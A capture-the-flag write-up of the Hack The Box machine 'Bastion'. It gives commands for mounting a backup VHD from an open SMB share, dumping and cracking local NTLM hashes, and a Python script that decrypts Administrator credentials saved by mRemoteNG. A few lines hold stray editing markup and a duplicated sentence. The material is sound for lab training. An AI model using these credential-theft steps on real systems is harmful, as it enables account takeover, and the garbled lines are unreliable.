Hack The Box — Bastion

Bastion is a Medium difficulty Windows machine on Hack The Box and is also OSCP-like. I would honestly rate this box between Medium and Hard and call it very tricky. On this machine we find an SMB share containing a VHD backup image, mount it with guestmount, pull the SAM and SYSTEM registry hives out of it and dump the local password hashes with samdump2 or pwdump. Finally we escalate privileges through mRemoteNG, a remote connection manager preinstalled on the target, because it stores the Administrator username and password in a known location in its configuration file.

ENUMERATION

We find that ports 22 (SSH), 135 (RPC) and 445 (SMB) are open.

I first try "smbmap -H 10.10.10.134" to list shares; however, anonymous listing of shares is not allowed that way. When I try smbclient instead, it works. As you can see, we can access the share called Backups.

We can upload files to this share as well, as you can see below. My plan was to upload an ASPX shell and execute it; however, that didn't work.

Within the Backups folder, I downloaded a file called note.txt with the following contents:

Searching deeper through the Backups directory, I found various files, two of which are interesting.

These are the two .vhd files. A VHD (Virtual Hard Disk) file is the disk image format used by Microsoft Virtual PC, Hyper-V and Windows Backup: it stores the full contents of a hard disk, partition table included. Because the images are several gigabytes, downloading them over the share is impractical. Instead we mount the share on our Kali box and mount the VHD straight from it.

NOTE: For this part of mounting VHD files, I was unable to install guestmount as Kali was missing packages and I had to update and upgrade my Kali, which takes a lot of time. Therefore I have provided screenshots from another writeup (https://www.hebunilhanli.com/wonderland/htb-bastion/).

DO READ THIS GUIDE FOR MOUNTING VHD FILES: https://medium.com/@klockw3rk/mounting-vhd-file-on-kali-linux-through-remote-share-f2f9542c1f25

The examination so far shows that a computer backup was stored inside the Backups share. Unlike Windows Explorer, where typing the UNC path of a share is enough to browse it, on Linux the share has to be mounted as a filesystem before the VHD inside it can be opened. Keep the sysadmin's warning in note.txt in mind: copying these files out of the share would take a long time, so we mount the share in place and read the image from there. The mount operations are as follows:

sudo apt-get install cifs-utils (installs the CIFS/SMB mount helper)

sudo mkdir -p /mnt/bastion_local_share (mount point for the remote share)

sudo mount -t cifs -o ro,guest //10.10.10.134/Backups /mnt/bastion_local_share (mounts the share read-only as a null session; without -o guest, just press Enter at the password prompt)

As you can see in the image above, there are two VHD images in the share. The "guestmount" tool from libguestfs attaches a virtual machine disk image to a directory on our computer.

sudo apt-get install libguestfs-tools (libguestfs is needed to access the guest filesystem)

sudo mkdir -p /mnt/bastion_vhd_share (mount point for the filesystem inside the VHD)

cd into the directory of the share that holds the image, then:

sudo guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --ro -m /dev/sda1 /mnt/bastion_vhd_share

The options are two dashes ("--add", "--ro"); Medium renders them as a single long dash, which guestmount will not accept. -m picks the partition inside the image; if you are unsure which one holds Windows, virt-filesystems (from the same package) will list them. --ro is deliberate: the share is someone's backup and we only need to read from it.

Once guestmount returns, the Windows filesystem inside the image is browsable under the mount point, as root, since it was mounted with sudo.

Initial Foothold

What to do next depends on what you know about Windows internals. Local accounts on Windows are stored in the SAM (Security Account Manager) registry hive. The password hashes inside it are encrypted with a key (the boot key, historically called SYSKEY) that is derived from values in the SYSTEM hive, so you need both hives together. Once decrypted, the SAM yields the LM and NTLM (NT) password hashes of every local user. Both hives live under Windows/System32/config/ on the mounted image.
</gml_replace>
<gr_replace lines="43" cat="clarify" orig="After copying">
After copying the SAM and SYSTEM files to our own machine, we can use samdump2 (which takes the SYSTEM hive first, then SAM) or pwdump to extract the NTLM hashes; impacket's secretsdump with the -sam and -system options against LOCAL does the same job. The hives in the image are offline copies, so nothing is locked and no live Windows box is needed.

After copying SAM and SYSTEM files to our own machine, we can use samdump2 tool or pwdump to detect NTML hash.

We get the LM and NT hashes of the user L4mpje. Only the NT hash matters on modern Windows; the LM field is normally the well-known empty-LM placeholder.

To crack the NT hash we can use CrackStation, or John the Ripper or hashcat with a wordlist (hashcat mode 1000 is NTLM).

With the cracked password we can SSH in as L4mpje, since port 22 is open. Keep in mind that the hash came from a backup image, so the password could have been rotated since the backup was taken; here it still works.

I was unable to transfer WinPEAS to the target; it showed "access denied".

The privilege escalation part is tricky as well. Looking at the installed programs, there is an unusual one called mRemoteNG, which is a remote connection session manager. It saves the IP address, username and password of every connection you configure so that you can reconnect to your servers with one click, which also means those credentials are sitting on disk for anyone who can read the user's profile.

We also find that mRemoteNG stores its saved connections, including usernames and passwords, in a file called confCons.xml in the user's roaming profile, under AppData\Roaming\mRemoteNG (see the image below for the exact path on this machine).

All we have to do is head to that directory and read confCons.xml; the Administrator's connection entry, with its Password attribute, is right there.

However, the Password value is not just base64 encoded. mRemoteNG encrypts it with AES (in GCM mode on current versions) using a key derived from a master password, and when the user never set one it falls back to a built-in default of "mR3m", which is why the value can be recovered offline. A quick search turns up a small Python tool on GitHub that decrypts the credentials stored by mRemoteNG.

LINK-https://github.com/haseebT/mRemoteNG-Decrypt

The last line of the README shows the usage.

We run it with the base64 string from the Password attribute passed via -s (and -p if a custom master password is known), and we immediately get the password in clear text.
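To show what that tool is actually doing, here is an added example (not the writeup's code and not the linked GitHub tool) that parses a confCons.xml, walks its connection nodes and decrypts each Password attribute the way mRemoteNG's AES-GCM provider stores it: base64 of salt (16 bytes), nonce (16 bytes), ciphertext and GCM tag (16 bytes), with the key derived by PBKDF2-HMAC-SHA1 from the master password and the salt, and the salt reused as associated data. The master password defaults to "mR3m". It uses whichever AES-GCM library is installed (cryptography or pycryptodome); the sample confCons.xml is constructed here with a password encrypted under the default key, not copied from the target.

```python
import base64
import hashlib
import os
import xml.etree.ElementTree as ET

DEFAULT_MASTER_PASSWORD = "mR3m"  # mRemoteNG's built-in default when no master password is set


def _aes_gcm():
    """Return (encrypt, decrypt) callables from the cryptography or pycryptodome library."""
    try:
        from cryptography.hazmat.primitives.ciphers.aead import AESGCM
        return (lambda k, n, p, ad: AESGCM(k).encrypt(n, p, ad),   # returns ciphertext||tag
                lambda k, n, c, ad: AESGCM(k).decrypt(n, c, ad))
    except ImportError:
        pass
    try:
        from Cryptodome.Cipher import AES
    except ImportError:
        from Crypto.Cipher import AES

    def enc(k, n, p, ad):
        cipher = AES.new(k, AES.MODE_GCM, nonce=n)
        cipher.update(ad)
        ct, tag = cipher.encrypt_and_digest(p)
        return ct + tag

    def dec(k, n, ct_tag, ad):
        cipher = AES.new(k, AES.MODE_GCM, nonce=n)
        cipher.update(ad)
        return cipher.decrypt_and_verify(ct_tag[:-16], ct_tag[-16:])
    return enc, dec


def derive_key(master_password: str, salt: bytes, iterations: int = 1000) -> bytes:
    """mRemoteNG key derivation: PBKDF2-HMAC-SHA1, 32-byte AES-256 key."""
    return hashlib.pbkdf2_hmac("sha1", master_password.encode("utf-8"), salt, iterations, dklen=32)


def decrypt_blob(b64: str, master_password: str = DEFAULT_MASTER_PASSWORD, iterations: int = 1000) -> str:
    raw = base64.b64decode(b64)
    if len(raw) < 48:
        raise ValueError("value too short to hold salt, nonce and GCM tag")
    salt, nonce, ct_tag = raw[:16], raw[16:32], raw[32:]
    _, dec = _aes_gcm()
    try:
        return dec(derive_key(master_password, salt, iterations), nonce, ct_tag, salt).decode("utf-8")
    except Exception as exc:  # InvalidTag or ValueError depending on the library
        raise ValueError("GCM tag mismatch: wrong master password or corrupted value") from exc


def encrypt_blob(plaintext: str, master_password: str = DEFAULT_MASTER_PASSWORD, iterations: int = 1000) -> str:
    """Inverse of decrypt_blob; used here only to build the constructed sample file."""
    salt, nonce = os.urandom(16), os.urandom(16)
    enc, _ = _aes_gcm()
    ct_tag = enc(derive_key(master_password, salt, iterations), nonce, plaintext.encode("utf-8"), salt)
    return base64.b64encode(salt + nonce + ct_tag).decode("ascii")


def extract_credentials(conf_xml: str, master_password: str = DEFAULT_MASTER_PASSWORD):
    """Walk every connection <Node> in confCons.xml and return its decrypted credentials."""
    root = ET.fromstring(conf_xml)
    iterations = int(root.get("KdfIterations", "1000"))  # root attribute on 1.75+ files
    found = []
    for node in root.iter("Node"):
        if node.get("Type") != "Connection" or not node.get("Password"):
            continue  # folders, or connections that inherit credentials
        found.append({
            "name": node.get("Name"), "host": node.get("Hostname"), "protocol": node.get("Protocol"),
            "username": node.get("Username"),
            "password": decrypt_blob(node.get("Password"), master_password, iterations),
        })
    return found


# Constructed sample shaped like a real confCons.xml (value encrypted under the default key).
SAMPLE_CONFCONS = f"""<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false"
  EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Username="Administrator" Domain="" Password="{encrypt_blob('S3cretP@ss')}" Hostname="127.0.0.1" Protocol="RDP" />
  <Node Name="Servers" Type="Container" />
</mrng:Connections>"""

if __name__ == "__main__":
    for cred in extract_credentials(SAMPLE_CONFCONS):
        print(f"{cred['name']}: {cred['username']}:{cred['password']} -> {cred['host']} ({cred['protocol']})")
```

A failed tag check is the signal that a custom master password was set; in that case the blob can still be attacked offline by brute-forcing the master password through the same PBKDF2 step, which is why a configuration file like this should never be readable by a lower-privileged account.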

Since it is the Administrator's password, we can simply use it to SSH in as Administrator.

We are now Administrator. The root flag is on the Administrator's Desktop (C:\Users\Administrator\Desktop\root.txt).

CONCLUSION

I hope you learned a lot from this writeup. I honestly found this machine pretty challenging, as it requires very deep enumeration to be solved on your own. We learned about mounting VHD files on Kali, and about mRemoteNG and how to abuse its stored, weakly protected credentials.

Make sure you follow me here on Medium for more such writeups,Until next time- ZEUS


I am a Penetration Tester, currently pursuing OSCP. Skilled in network pen-testing and developing hacking tools using Python. I share my knowledge on YouTube.
